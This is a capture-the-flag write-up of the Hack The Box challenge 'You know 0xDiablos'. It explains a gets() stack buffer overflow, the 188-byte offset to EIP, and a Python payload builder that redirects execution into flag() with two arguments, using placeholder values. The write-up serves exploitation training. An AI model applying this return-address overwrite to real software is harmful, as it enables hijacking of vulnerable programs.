You know 0xDiablos Hackthebox (PWN)

Hariharan@Blog:~$
3 min read · Aug 11, 2021

This is an easy PWN challenge on Hackthebox, but it does involve some reverse engineering to get the exploit right. Let's get started with the challenge.

Challenge

We need to check the file type and memory protection in the binary before we begin our exploit.

It is dynamically linked and not stripped. Also, there is no PIE and the NX bit is not switched on. We could try finding some interesting functions that we could use here. To list all the functions I used "info function" in GDB.

We have two functions of interest, vuln() and flag(). Before going through these functions, let us disassemble "main".

We can see a call to vuln() in main(). Nothing vulnerable in main() itself.

Next we disassemble the vuln() function. We can see gets() being used here, which reads input with no length limit, so that opens up the possibility of a buffer overflow. To exploit it we need to overflow the buffer, the padding, and the saved EBP to reach the saved EIP. We could use "pattern create 200" inside GDB-peda to create a cyclic pattern of 200 characters. Now run the binary with that pattern as input inside GDB.

Notice how the registers have changed. EBP and EIP have been overwritten with the pattern we gave as input. Now to find the offset at which EIP gets overwritten, we could use "pattern offset" on the value now sitting in EIP.

So it takes 188 bytes to overwrite the buffer, padding, and saved EBP; the bytes after that land in EIP.

Next, we need to disassemble flag() to see what we could do with this function. This part took some time to understand as there were string compare functions being called. I did a bit of reverse engineering here, but failed to understand it. So I used Cutter to understand what they have done here.

We can see a call to fgets() and then an "if" check. Here it took me a while to figure out what is happening. Clearly, another input is being taken in, and this time we need to supply 2 inputs (arguments) to flag(). So we need to see the stack layout clearly before we proceed here.

We need to give the arguments after the return address. But that leaves out a small portion: after the return address, there are 4 bytes of space (the slot where flag() expects its own return address) before we give our arguments. So I'll draw the full stack diagram.

So I wrote my exploit accordingly in Python.

Don’t forget to change your host and port value. Executing this will give our flag.
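As an added example (not the exploit script from this post), the following Python re-implements the two GDB-peda helpers used above, "pattern create" and "pattern offset", and then lays out the payload structure from the stack diagram: 188 bytes up to the saved EIP, the return address, a 4-byte slot that flag() will treat as its own return address, and only then flag()'s two arguments. The address of flag() and the two argument values are placeholders, since the post does not list them, and the arguments are assumed to be 4-byte values (if flag() compares strings, those slots would hold pointers instead).

```python
import string
import struct

# From the writeup: buffer + padding + saved EBP = 188 bytes before saved EIP.
OFFSET_TO_EIP = 188


def pattern_create(length):
    """Cyclic pattern in the same style as GDB-peda's "pattern create":
    triples of Upper/lower/digit, so every 4-byte window is unique for
    well over 200 bytes and the EIP value can be located unambiguously."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, value):
    """Equivalent of "pattern offset": given the value that landed in EIP
    (as a 32-bit int read from the register, or as raw bytes), return its
    byte offset in the pattern, or -1 if it is not part of the pattern."""
    needle = value.to_bytes(4, "little") if isinstance(value, int) else value
    return pattern.find(needle)


def build_layout(flag_addr, arg1, arg2, offset=OFFSET_TO_EIP):
    """Lay out the payload exactly as the stack diagram describes.
    flag_addr, arg1 and arg2 are placeholders supplied by the caller."""
    payload = b"A" * offset                        # fill buffer, padding, saved EBP
    payload += struct.pack("<I", flag_addr)        # saved EIP now points at flag()
    payload += struct.pack("<I", 0xDEADBEEF)       # slot flag() reads as its return address (placeholder)
    payload += struct.pack("<I", arg1)             # first argument to flag()
    payload += struct.pack("<I", arg2)             # second argument to flag()
    return payload


def describe_layout(payload, offset=OFFSET_TO_EIP):
    """Map each stack slot to its byte offset in the payload, to check the
    diagram against what is actually being sent."""
    return {
        "saved_eip": offset,
        "flag_return_slot": offset + 4,
        "arg1": offset + 8,
        "arg2": offset + 12,
        "total_length": len(payload),
    }


if __name__ == "__main__":
    # Constructed scenario: EIP ended up holding the 4 pattern bytes at offset 188,
    # just as the writeup's GDB session shows.
    pat = pattern_create(200)
    eip_seen_in_gdb = int.from_bytes(pat[188:192], "little")
    print("EIP offset:", pattern_offset(pat, eip_seen_in_gdb))

    # Placeholder address and argument values; replace with the real ones from the binary.
    layout = build_layout(0x08040000, 1, 2)
    print(describe_layout(layout))
```

Running the block prints the recovered offset (188) and the byte positions of each slot, which is a quick way to confirm that the arguments really sit 8 and 12 bytes past the overwritten return address before sending anything to the target.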

Hope you understood the challenge. Do check out my other blogs.

Don’t forget to give some claps if you reached here :) Follow me for more writeups.

Goodbye:)
